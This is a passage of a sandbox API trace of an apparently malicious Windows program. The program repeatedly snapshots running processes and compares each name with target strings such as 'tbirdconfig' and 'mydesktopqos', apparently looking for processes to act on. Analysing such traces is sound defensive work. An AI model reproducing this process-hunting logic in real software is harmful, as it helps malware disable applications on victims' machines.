cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0095.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0095.385] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356acb8 [0095.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356acb8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0095.385] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0095.385] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="tbirdconfig") returned 0x0 [0095.385] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0095.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.387] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572fc0 [0095.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3572fc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.387] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0095.387] StrStrIA (lpFirst="conhost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.387] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0095.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.388] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572e28 [0095.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3572e28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0095.388] StrStrIA (lpFirst="conhost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.388] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.389] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572ff0 [0095.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572ff0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.390] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.390] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.390] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0095.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.391] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573008 [0095.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3573008, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0095.391] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0095.391] StrStrIA (lpFirst="rxodge.exe", lpSrch="tbirdconfig") returned 0x0 [0095.391] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0095.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.392] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573038 [0095.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3573038, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0095.392] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0095.392] StrStrIA (lpFirst="sppsvc.exe", lpSrch="tbirdconfig") returned 0x0 [0095.392] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0095.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.394] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35747a8 [0095.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x35747a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0095.394] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0095.394] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="tbirdconfig") returned 0x0 [0095.394] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0095.394] CloseHandle (hObject=0x358) returned 1 [0095.395] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0095.410] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.412] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35747c8 [0095.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x35747c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0095.412] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0095.412] StrStrIA (lpFirst="[System Process]", lpSrch="mydesktopqos") returned 0x0 [0095.412] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0095.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0095.413] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574d80 [0095.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574d80, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0095.413] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0095.413] StrStrIA (lpFirst="System", lpSrch="mydesktopqos") returned 0x0 [0095.413] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0095.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.415] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3572d80 [0095.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3572d80, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0095.415] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0095.415] StrStrIA (lpFirst="smss.exe", lpSrch="mydesktopqos") returned 0x0 [0095.415] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.416] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572db0 [0095.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3572db0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0095.416] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0095.416] StrStrIA (lpFirst="csrss.exe", lpSrch="mydesktopqos") returned 0x0 [0095.416] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0095.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.417] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572dc8 [0095.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3572dc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0095.417] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0095.418] StrStrIA (lpFirst="wininit.exe", lpSrch="mydesktopqos") returned 0x0 [0095.418] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.419] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572de0 [0095.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3572de0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0095.419] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0095.419] StrStrIA (lpFirst="csrss.exe", lpSrch="mydesktopqos") returned 0x0 [0095.419] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0095.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.420] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572df8 [0095.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3572df8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0095.420] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0095.420] StrStrIA (lpFirst="winlogon.exe", lpSrch="mydesktopqos") returned 0x0 [0095.420] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0095.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.422] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572e10 [0095.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3572e10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0095.422] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0095.422] StrStrIA (lpFirst="services.exe", lpSrch="mydesktopqos") returned 0x0 [0095.422] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0095.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.430] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573170 [0095.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3573170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0095.430] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0095.430] StrStrIA (lpFirst="lsass.exe", lpSrch="mydesktopqos") returned 0x0 [0095.430] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.431] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35732c0 [0095.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35732c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.431] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.431] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.431] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0095.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.432] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35731a0 [0095.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35731a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0095.432] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0095.433] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.433] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0095.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.434] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3573200 [0095.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3573200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0095.434] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0095.434] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.434] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.435] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35731b8 [0095.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35731b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.435] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.435] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.435] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0095.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.436] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574e10 [0095.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574e10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0095.437] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0095.437] StrStrIA (lpFirst="dwm.exe", lpSrch="mydesktopqos") returned 0x0 [0095.437] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.438] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35730f8 [0095.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35730f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.438] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.438] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.438] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.439] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35732d8 [0095.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35732d8, cbMultiByte=12, 